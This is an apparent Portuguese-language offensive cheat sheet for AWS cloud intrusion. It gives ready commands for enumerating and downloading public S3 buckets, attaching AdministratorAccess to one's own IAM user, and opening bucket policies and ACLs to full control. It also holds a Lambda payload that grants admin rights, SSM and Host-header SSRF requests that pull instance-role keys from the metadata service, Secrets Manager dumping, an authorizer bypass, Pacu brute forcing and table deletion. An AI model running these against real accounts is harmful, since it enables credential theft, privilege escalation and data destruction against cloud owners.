AWS
Chaves
Tamanho e Tipos de Chaves
Access Key = 20 chars
Access Secret Key = 40 chars
Session Token = Chave temporária opicional
Prefixo de Chaves
ABIA
AWS STS Service Bearer Token
ACCA
Context-Specific Credential
AGPA
User Group
AIDA
IAM User
AIPA
Amazon EC2 Instance Profile
AKIA
Access key (Chave de longa duração importante que raramente é modificada)
ANPA
Managed Policy
ANVA
Version in a Managed Policy
APKA
Public key
AROA
Role
ASCA
Certificate
ASIA
Os IDs de chave de acesso temporário (AWS STS) usam esse prefixo, mas são exclusivos apenas em combinação com a Secret Access Key e o Session Token.
S3
O Amazon Web Services (AWS) fornece um serviço chamado S3 (Simple Storage Service), que expõe uma interface de container de armazenamento chamado de "bucket" e os arquivos dentro do bucket são chamados de "objects". O S3 fornece um armazenamento ilimitado para cada bloco e os proprietários podem usá-los para disponibilizar arquivos. Os arquivos podem ser vinculados de forma privada (via URL com assinatura) ou pública por meio de uma ACL (Access Control List) configurada adequadamente ou por meio de uma ACP (Access Control Policy).
Todos os Buckets S3, quando configurados para hospedagem na web, recebem um domínio da AWS que você pode usar para navegar até ele sem configurar seu próprio DNS. Por exemplo, a página web http://mysther.com também pode ser visitado em http://mysther.com.s3-website-us-west-2.amazonaws.com/. Sendo assim, podemos nesse caso acessar a URL https://mysther.com.s3.amazonaws.com/ e vermos a lista de arquivos expostos.
Uma outra maneira de vermos é através do utilitário aws cli, acesso via terminal. Supondo que temos a seguinte URL https://mysther-static-resources.s3-ap-southeast-1.amazonaws.com/, podemos pegar somente o seu prefixo (mysther-static-resources) e então executar o seguinte comando (altere a região, caso necessário):
Enumeração (sem autenticação)
aws s3 --no-sign-request --region ap-southeast-1 ls s3://mysther-static-resourcesCaso tenha sido listado diretório, podemos acessá-la da seguinte forma:
aws s3 --no-sign-request --region ap-southeast-1 ls s3://mysther-static-resources/<directoy>/E por fim, fazer download de arquivos
aws s3 --no-sign-request --region ap-southeast-1 cp s3://mysther-static-resources/<directory>/<file> ./Enumeração (com autenticação)
Listando Buckets
aws s3api list-bucketsListando objetos de um determinado Bucket
aws s3api list-objects --bucket <bucket_name>Fazendo download de arquivos. Note que key, é o nome do Objeto (no caso, um arquivo)
aws s3 cp s3://<bucket_name>/<key> .OBS.: Ao localizar um Bucket, podemos acessá-lo via web, seguindo um dos seguintes padrões: https://<bucket_name>.s3.amazonaws.com/<file> ou http://<bucket_name>.s3-website-us-east-1.amazonaws.com/<file>
AWS CLI
Instalação
sudo apt install awscliConfiguração
Antes de começar, vamos configurar nossa chave de acesso. Para isso temos a maneira mais prática, que é executando o comando abaixo e depois inserindo as chaves.
aws configureE podemos também, fazer de forma manual, criando um arquivo ~/.aws/credentials com o conteúdo abaixo. Caso não configure essa chave, provavelmente receberá um erro do tipo: Partial credentials found in shared-credentials-file, missing: aws_secret_access_key
Para pegar as credenciais, vá no painel da AWS, clique no nome do usuário que está no canto superior à direita e depois em My Security Credentials. Feito isso vá em Access Keys (access key ID and secret access key) e gere uma chave.
[default]
aws_access_key_id = <key>
aws_secret_access_key = <key>Esse processo obviamente é bem manual, já que estamos criando um arquivo manualmente e inserindo valores nele, então vamos deixar com que o próprio comando aws faça o "trabalho sujo" por nós.
Note que, editando o arquivo manualmente, podemos inserir o valor do token temporário em aws_session_token, já utilizando o comando aws configure, já não é possível definir esse valor.
aws configure --profile <profile>Feito isso, informe o Key ID e o Access Key. Note que o diretório ~/.aws pode ficar um pouco diferente. O arquivo ~/.aws/credentials que já existia, agora tem uma configuração a mais e foi criado (caso não tinha) o arquivo ~/.aws/config, que contém a configuração das regiões.
Comandos Básicos
Pegando o UserID e o Account Name. Caso não defina o profile, por padrão será utilizado o profile default. Em ~/.aws/credentials, podemos ver o profile, que está entre colchete.
aws --profile <profile> sts get-caller-identityDetalhes do snapshot da EC2
aws --profile <profile> ec2 describe-snapshotsCaso queira pegar um usuário em específico, é necessário adicionar o Owner, exemplo:
aws --profile <profile> ec2 describe-snapshots --owner-id <account>Listando as permissões do S3 Bucket
aws s3api get-bucket-acl --bucket <bucket>Listando arquivos em AWS Buckets públicos
aws s3 ls s3://<bucket_name> --no-sign-requestCaso já possua uma chave válida configurada, podemos listar os arquivos de uma forma mais prática
aws --profile <profile> s3 lsBaixando conteúdo do Bucket
aws s3 sync s3://<bucket_name> --no-sign-request </dir/to/download/>Fazendo upload de arquivos
aws s3 mv text.txt s3://<bucketname>Verificando permissões de um determinado arquivo
aws s3api get-object-acl --bucket <bucket> --key <file>IAM
O IAM (Identity and Access Management), é um serviço da Web que ajuda no controle de acessos aos recursos da AWS. É através do IAM, que podemos controlar quem é autenticado (que fez login) e autorizado (que tem permissão) a usar os recursos.
Por esse motivo, o IAM é um ponto totalmente visado a ataques, já que está centralizando e gerenciandos acessos a recursos.
Users
Informações sobre o usuário atual
aws iam get-userListando todos os Usuários
aws iam list-usersNão esqueça de ver as Policies que estão adicionadas aos outros usuários
aws iam list-attached-user-policies --user-name <UserName>Criando um usuário. Note que nossa conta AWS precisa possuir tal permissão, então verifique mais abaixo como fazer para verificar as nossas políticas atuais e como fazer para anexar uma política administrativa em nosso usuário
aws iam create-user --user-name <username>Após enumerar os usuários, crie um perfil de Login e acesse a plataforma via web
aws iam create-login-profile --user-name <username> --password <pass> --no-password-reset-requiredGroups
Listando todos os Grupos
aws iam list-groupsListando grupos de um determinado usuário
aws iam list-groups-for-user --user-name <user>Adicionando um usuário em um grupo
aws iam add-user-to-group --group-name <group> --user-name <user>Policies
Enumerando Políticas
aws iam list-policiesPolíticas associadas em um grupo
aws iam list-attached-group-policies --group-name <grupo>Para mais detalhes sobre uma determinada Política, pegue o ARN com o comando acima e depois execute:
aws iam get-policy --policy-arn <arn-policy>
aws iam get-policy-version --policy-arn <arn-policy> --version-id <v1>Listando detalhes das Política de um determinado Usuário
aws iam list-user-policies --user-name <user>Com a saída do comando acima, execute o comando abaixo mais detalhes
aws iam get-user-policy --user-name <user> --policy-name <PolicyNames>Com a saída do comando acima, verifique se em Resource ou em Action há algo que possa ser interessante para escalar algum tipo de privilégio. Para executar o comando abaixo e verificarmos as Roles de uma Policy, vamos pegar como exemplo a seguinte saída: "Resource": ["arn:aws:iam::658552018120:role/Example"] e então utilizar somente o Example no final e executar:
aws iam list-role-policies --role-name <Example>Agora vamos pegar o retorno de PolicyNames do comando acima e então executar. Verifique o conteúdo em Statement
aws iam get-role-policy --role-name <Example> --policy-name <PolicyNames>Procurando por política ARN administrativa
aws iam list-policies | grep AdministratorAccessApós isso, nós podemos anexar a política AdministratorAccess em nossa conta de usuário, bastando apenas pegar a <PolicyArn> na saída do comando acima
aws iam attach-user-policy --user-name <username> --policy-arn <PolicyArn>Verificando políticas anexadas a um determinado usuário
aws iam list-attached-user-policies --user-name <username>Com o resultado do comando acima, utilize o valor de PolicyArn para executar o comando abaixo, retornando assim mais detalhes sobre uma determinada Policy
aws iam get-policy --policy-arn <PolicyArn>Verificando certificado assinado do usuário
aws iam list-signing-certificates --user-name <user>Verificando por chave públic SSH do usuário.
aws iam list-ssh-public-keys --user-name <user>Com o resultado do comando acima, utilize o valor de SSHPublicKeyId para executar o próximo comando
aws iam get-ssh-public-key --user-name <user> --encoding PEM --ssh-public-key-id <SSHPublicKeyId>Verificando se um determinado usuário possui login na console
aws iam get-login-profile --user-name <user>Verificando políticas de um determinado grupo
aws iam list-group-policies --group-name <group>Roles
Enumerando as Roles
aws iam list-rolesDetalhes de uma determinada Role
aws iam get-role --role-name <RoleName>Verificando as Policies de uma Role
aws iam list-role-policies --role-name <RoleName>Assumindo uma role
aws sts assume-role --role-arn <arn:aws:iam::658552018120:role/Example> --role-session-name <example_test>Execute o próximo comando, de acordo com a saída do comando anterior
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<SessionToken>Note que fazendo isso, você substituindo seus acessos, então caso queria voltar ao normal, utilize o comando abaixo:
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY
unset AWS_SESSION_TOKENMisconfigured Trust Policy
aws sts assume-role --role-arn arn:aws:iam::<aws_account>:role/<role> --role-session-name ad_loggingDefina as variáveis, sendo os valores de acordo com o resultado do comando cima
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<SessionToken>Verificando se as configurações
aws sts get-caller-identityVerificando se há alguma política com s3 disponível
aws iam list-attached-role-policies --role-name <role_name>Caso possua um s3 disponível, execute o comando abaixo para listar o conteúdo disponível nessa s3
aws s3 lsPACU
Instalação
pip3 install -U pacuInicializando
pacuDefinindo as chaves
set_keysBrute Force em Users
run iam__enum_users --role-name a4 --account-id <999999999999> --word-list <wordlist.txt>Brute Force em Roles
run iam__enum_roles --role-name a4 --account-id <999999999999> --word-list <wordlist.txt>Bucket
Listando Buckets
aws s3api list-buckets
aws --endpoint http://<site.com>:<port> s3api list-bucketsListando objetos/arquivos de um determinado Bucket
aws s3api list-objects --bucket <bucket_name>
aws --endpoint http://<site.com>:<port> s3 ls s3://<bucket_name>Baixando um bucket completo
aws --profile <profile> s3 sync s3://<bucket_name> ./Fazendo download de arquivo que está armazenado em um determinado Bucket
aws s3 cp s3://<bucket_name>/<file> .
aws --endpoint http://<site.com>:<port> s3 cp s3://<bucket_name>/<file> ./Fazendo upload de arquivo
# Arquivo novo
aws --endpoint http://<site.com>:<port> s3 cp <file> s3://<bucket_name>/
# Substituindo conteúdo de um arquivo existente
aws --endpoint http://<site.com>:<port> s3 cp <file> s3://<bucket_name>/<file>Deletando arquivo remoto
aws --endpoint http://<site.com>:<port> s3 rm s3://<bucket_name>/<file>Verificando as Policies de um determinado Bucket. Em algumas ocasiões, podemos ver os nomes dos arquivos, o que pode ser útil quando não temos acesso a leitura dos objetos do Bucket. Em outros casos, podemos ver configurações onde é possível ter acesso por exemplo, utilizando somente um determinado User Agent.
aws s3api get-bucket-policy --bucket <bucket_name> --output text | jq
aws --endpoint http://<site.com>:<port> s3api get-bucket-policy --bucket <bucket_name>Caso possua permissão para atualizar as políticas, salve o resultado do comando acima e substitua o Deny por Allow e deixe partes como s3:GetBucketPolicy como s3:*. Também altere o Resource colocando um * no final, caso esteja apontando para algum arquivo em específico.
Agora faça upload do json modificado.
aws s3api put-bucket-policy --bucket <bucket_name> --policy file://<file.json>Alterando ACL do Bucket
Primeiro precisamos baixar a ACL de um determinado bucket e salvar a saída em um arquivo json
aws s3api get-bucket-acl --bucket <bucket_name> > <file-acl.json>Agora basta editar o arquivo, alterando o valor de Permission para FULL_CONTROL e depois atualizar a ACL atavés do comando abaixo:
aws s3api put-bucket-acl --bucket <bucket_name> --access-control-policy file://<file-acl.json>Para verificar se deu certo utilize o segundo comando acima, porém sem jogar a saída para um arquivo json
Alterando ACL do Objeto em um Bucket
Primeiro precisamos baixar a ACL de um determinado objeto (arquivo) do bucket e salvar a saída em um arquivo json
aws s3api get-object-acl --bucket <bucket_name> --key <file> > <output-file.json>Agora basta editar o arquivo, alterando o valor de Permission para FULL_CONTROL e depois atualizar a ACL atavés do comando abaixo:
aws s3api put-object-acl --bucket <bucket_name> --key <file> --access-control-policy file://<output-file.json>C2
Analisando instâncias
aws ec2 describe-instancesPegando o AMI ID
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'Analisando subnets (aqui podemos encontrar o valor de SubnetId)
aws ec2 describe-subnetsListando grupos de segurança
aws ec2 describe-security-groups (aqui podemos encontrar o valor de `GroupId`, por exemplo, `sg-12ad125a1b78c60`)Listando perfis de instancias (aqui podemos encontrar o valor de InstanceProfileName)
aws iam list-instance-profilesInicializando uma EC2
aws ec2 run-instances --subnet-id <SubnetId> --image-id <ami-id> --iam-instance-profile Name=<InstanceProfileName> --instance-type t2.micro --security-group-ids "<GroupId>"Com a saída do comando acima, atente-se ao valor de InstanceId e utilize-o abaixo para executarmos um comando no OS do EC2. No primeiro exemplo, estamos pegando as chaves de acesso e no segundo exemplo, apenas executando o comando id. Não se esqueça de altera o roleName, como fizemos com o <Example>
# Pegando chaves de acesso
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<roleName>/"]' --targets "Key=instanceids,Values=<InstanceId>"
# id
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["<command>"]' --targets "Key=instanceids,Values=<InstanceId>"Note que apesar de termos executado o comando, não obtemos a sua saída. Para isso, precisamos realizar mais uma requisição, onde podemos ver ser o output do comando em StandardOutputContent. Atente-se ao CommandId que foi retornado no comando anterior
aws ssm get-command-invocation --command-id "<CommandId>" --instance-id "<InstanceId>"Lambda
Listando Function Lambda
aws lambda list-functionsPara criar uma Function Lambda, primeira crie um arquivo chamado aws.py com o conteúdo abaixo. Isso irá adicionar um determinado usuário a Política de Administradores.
import boto3
def handler(event, context):
iam = boto3.client("iam")
response = iam.attach_user_policy(
UserName="<user>", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return responseCompacte o arquivo criado:
zip aws.zip aws.pyCrie a Function Lambda através do comando
aws lambda create-function --function-name aws-function --runtime python3.8 --zip-file fileb://aws.zip --handler aws.handler --role <arnRole>Agora execute a Function criada
aws lambda invoke --function-name aws-function <output_file.txt>Se ver novamente nas Policies do usuário, terá o AdministratorAccess
aws iam list-attached-user-policies --user-name <user>Lambda Authorizer
O Lambda Authorizer é um recurso do API Gateway que usa uma função do Lambda para controlar o acesso à API. Com base nas informações fornecidas na solicitação, ou seja, tokens, parâmetros de solicitação etc, a função Lambda retorna uma política que permite ou nega o acesso à API.
Um ponto que podemos fazer para driblar isso é, acessar a URL http://ab.cd-api.us-east-1.amazonaws.com/dev/status com algum token aleatório para que seja validado e após isso,utiizar esse que foi validado em http://ab.cd-api.us-east-1.amazonaws.com/dev/admin. Exemplo:
$TOKEN=$RANDOM
curl 'http://ab.cd-api.us-east-1.amazonaws.com/dev/status' -H "Authorization: $TOKEN"
curl 'http://ab.cd-api.us-east-1.amazonaws.com/dev/admin' -H "Authorization: $TOKEN"DynamoDB
Select
Listando tabelas do DynamoDB Server
aws --endpoint http://<ip>:4567 dynamodb list-tablesVerificando a estrutura de uma determinada tabela
aws --endpoint http://<ip>:4567 dynamodb describe-table --table <table>Lendo conteúdo de uma determinada tabela
aws --endpoint http://<ip>:4567 dynamodb scan --table <table>Para pesquisar por um valor específico, crie um arquivo chamado find.json com o conteúdo abaixo, altere a chave S com o respectivo index, caso seja necessário:
{
":value": {"S": "<value>"}
}Agora execute o comando de busca
aws --endpoint http://<ip>:4567 dynamodb scan --table users --filter-expression "<field_to_filter> = :value" --projection-expression "<field_to_return>" --expression-attribute-values file://</path/to/find.json>Outra maneira de pesquisar, é da forma abaixo, porém aqui estamos filtrando por um campo diferente
aws --endpoint http://<ip>:4567 dynamodb query --table <table> --key-condition-expression "<field_to_filter> = :value" --expression-attribute-value file://</path/to/find.json>Caso o json possua mais, valores, podemos organizá-lo da seguinte forma:
{
":value1": {"S": "<value>"},
":value2": {"S": "<value>"}
}Agora em nossa --key-condition-expression, podemos deixa no seguinte padrão:
... --key-condition-expression "<field_to_filter> = :value1 and <field_to_filter> = :value2" ...Insert
Crie um arquivo chamado insert.json com o seguinte valor (altere o nome das chaves e valores):
{
"<field>": {"S":"<value>"},
"<field>": {"S":"<value>"}
}Agora execute
aws --endpoint http://<ip>:4567 dynamodb put-item --table <table> --item file://</path/to/insert.json>Para verificar se realmente deu certo, crie um arquivo chamado search.json com o seguinte conteúdo (altere o field e o value para ser igual o foi inserido anteriormente):
{
"<field>": {"S": "<value>"}
}Agora realize a pesquisa com o comando
aws --endpoint http://<ip>:4567 dynamodb get-item --table <table> --key file://</path/to/search.json>Update
Podemos também, atualizar um objeto. Para isso vamos criar um arquivo chamado key.json definindo o index (field) e seu respectivo valor, seguindo o seguinte padrão:
{
"<field>": {"S": "<value>"}
}Agora iremos criar um segundo arquivo chamado value.json, que irá conter o novo valor que iremos atribuir para o registro que der "match" com a condição do arquivo key.json criado acima
{
":value": {"S": "<new_value>"}
}Por fim, execute o comando para atualizar o banco de dados
aws --endpoint http://<ip>:4567 dynamodb update-item --table <table> --key file://</path/to/key.json> --update-expression "SET <field_to_change> = :value" --expression-attribute-values file://</path/to/value.json>Para verificar se deu certo, execute
aws --endpoint http://<ip>:4567 dynamodb get-item --table <table> --key file://</path/to/key.json>Delete
Deletando registro de uma tabela
aws --endpoint http://<ip>:4567 dynamodb delete-item --table <table> --key file:///<path/<to>/<file.json>Deletando uma tabela
aws --endpoint http://<ip>:4567 dynamodb delete-table --table <table>Bucket Finder
Procura por buckets que estão públicos e baixa o seu conteúdo.
./bucket_finder.rb --region us <wordlist> --downloadPegando Chaves
Ao acessar um servidor web hospedado na AWS, utilize o 169.254.169.254 no header Host para pegar dados sensíveis, incluindos as chaves AWS
curl http://<ip>/ -H 'Host: 169.254.169.254'
curl http://<ip>/latest/meta-data/iam/security-credentials/<role_name> -H 'Host: 169.254.169.254'Secret Managers
Configurando o AWS
export AWS_ACCESS_KEY_ID = <aws_access_key_id>
export AWS_SECRET_ACCESS_KEY = <aws_secret_access_key>
export AWS_SESSION_TOKEN = <aws_session_token>Enumerando os Callers Identity
aws sts get-caller-identity Listando os Secret Managers
aws secretsmanager list-secrets --region <us-east-1>Alterr o <name> abaixo pela retorno de Name no comando anterior
aws secretsmanager get-secret-value --secret-id <name>IMDS
É possível acessar metadados de instância em uma instância em execução utilizando o IMDSv1 (método de solicitação/resposta) ou o IMDSv2 (método orientado a sessões). Os cabeçalhos PUT ou GET são exclusivos do IMDSv2. Se esses cabeçalhos estiverem presentes na solicitação, a solicitação será destinada ao IMDSv2. Se nenhum cabeçalho estiver presente, presume-se que a solicitação seja destinada ao IMDSv1.
Ao acessarmos a URL abaixo, podemos receber um 401 - Unauthorized
curl http://169.254.169.254/latest/meta-dataPorém podemos contarnar isso com o comando abaixo, onde iremos pegar o token e jogar na variável TOKEN:
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H
"X-aws-ec2-metadata-token-ttl-seconds: 21600"`Agora com o token em mãos, vamos pegar todos os serviços
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/Feito isso, podemos navegar nos diretórios localizados, como no exemplo abaixo, no diretório iam (caso exista). Dentro do diretório iam irão existir mais arquivos e diretórios que podem ser acessados, então vá sempre adicionando eles no final da URL
curl http://169.254.169.254/latest/meta-data/iam/ -H "X-aws-ec2-metadata-token: $TOKEN"Acessando via Postman com Access Key e Access Secret Key
Depois de ter em mãos o Access Key (chave com o prefixo AKIA) e o Access Secret Key, abra o Postman e na aba de autenticação, selecione AWS Signature. Insira então as duas chaves, a região (por exemplo us-east-1) e o Service Name, que podemos pegar na URL, onde temos o valor execute-api, para a URL. https://a2s4f3fcl6.execute-api.us-east-1.amazonaws.com/default/
Sites
# Pesquisa pública da Open Amazon S3 Buckets
https://buckets.grayhatwarfare.com/
# Explicação sobre a AWS
https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/
# Gerador de Policies
https://awspolicygen.s3.amazonaws.com/policygen.html
# PACU
https://github.com/RhinoSecurityLabs/pacu1Last updated
Was this helpful?